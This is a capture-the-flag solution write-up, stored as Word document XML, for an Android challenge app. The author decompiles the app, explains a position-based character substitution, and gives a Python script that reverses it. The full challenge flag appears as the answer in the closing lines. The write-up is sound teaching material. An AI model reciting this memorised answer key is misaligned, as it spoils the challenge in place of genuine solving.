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9B7BB" w14:textId="6103A8C5" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>WEIRD-APP SOLUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF91E12" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>We were given an app-debug.apk Android application. When running or decompiling, the app only displayed a “Transformed flag” instead of the real one:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190375FA" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Transformed flag: idvi+1{s6e3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>{)arg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>zv[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>moqa905+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D1BEB4" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>The task was to reverse the transformation to recover the original flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DD2C9" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="7B8A3EAD">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DC4939" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Step 1: Inspecting the APK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F2189A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>I unzipped/decompiled the APK using apktool/jadx.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>Inside com/example/test2/MainActivity.kt, I found this interesting line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA6A063" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>const-string v4, "Transformed flag: idvi+1{s6e3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>{)arg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>zv[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>moqa905+"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3663EB01" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>and a helper function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B54B7" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>.method</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> public static final </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>transformFlag(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Ljava/lang/String;)Ljava/lang/String;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292DB1AB" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="01935FCC">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5905C802" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Step 2: Understanding the transformFlag Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6DB3A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Decompiled pseudo-code of transformFlag showed the following logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A52C7E" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">Define </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>three character</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> sets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A8B13E" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>alpha = "abcdefghijklmnopqrstuvwxyz"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A47EB3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>nums = "0123456789"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D7770" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">spec = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>"!@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>#$%^&amp;*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>()_+{}[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>]|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBD86F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>For each character in the input flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAADE82" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">If it’s a letter: output = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>alpha[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(pos + index) % 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1527064F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">If it’s a digit: output = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>nums[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(pos + 2*index) % 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529B987" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">If it’s a special char: output = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>spec[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(pos + index^2) % len(spec)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF25B0" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>In other words, each character was shifted depending on its position index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15D33D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="0DCECCC9">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55A033" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Step 3: Reversing the Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEFCAF2" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>To undo the mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949A106" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Letters: pos = (t - i) % 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B32770" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Digits: pos = (t - 2*i) % 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFCDFBB" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:lastRenderedPageBreak/>
        <w:t>Specials: pos = (t - i^2) % len(spec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F200649" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>I wrote a quick Python script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E1A60" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>alpha = "abcdefghijklmnopqrstuvwxyz"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66B861" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>nums  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> "0123456789"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC4378" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>spec  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>"!@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>#$%^&amp;*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>()_+{}[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>]|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32753174" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="54F70755" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>def invert_transform(transformed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E119B4" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    out = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA3CF5B" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    for i, ch in enumerate(transformed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60569C0A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        if ch in alpha:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD1E7F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            t = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>alpha.index</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(ch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D77D970" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            k = (t - i) % len(alpha)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD555C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>out.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(alpha[k])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2082B0" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        elif ch in nums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394272BA" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            t = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>nums.index</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(ch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45382CC6" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            k = (t - 2*i) % len(nums)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A94A7" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>out.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(nums[k])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C593A5" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        elif ch in spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BE1DFF" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            t = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>spec.index</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(ch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F919F9E" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            k = (t - i*i) % len(spec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A56463" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>out.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(spec[k])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24090AB3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC3B9D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>out.append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(ch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7AD8F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    return "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>".join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>(out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A1148" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="3EC5B1D3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>print(invert_transform("idvi+1{s6e3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>{)arg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>2zv[moqa905+"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143CE1C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="5192ECEC">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146D592" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Step 4: Recovering the Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757C343A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:lastRenderedPageBreak/>
        <w:t>Running the script produced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC8E61" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>ictf{1_l0v3_@ndr0id_stud103}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661EFC13" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="0C97FE08">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB940C4" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Final Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F66D34" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>ictf{1_l0v3_@ndr0id_stud103}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7EF294" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="3100765E" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="49BA4514" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="2ECC4D60" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="04EBC285" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="75FF1AE6" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="68AC47EE" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="088BE850" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="33C54A0A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="14DD9994" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="49CBDB28" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="14F22B7A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="6306ADF2" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="0C76200A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
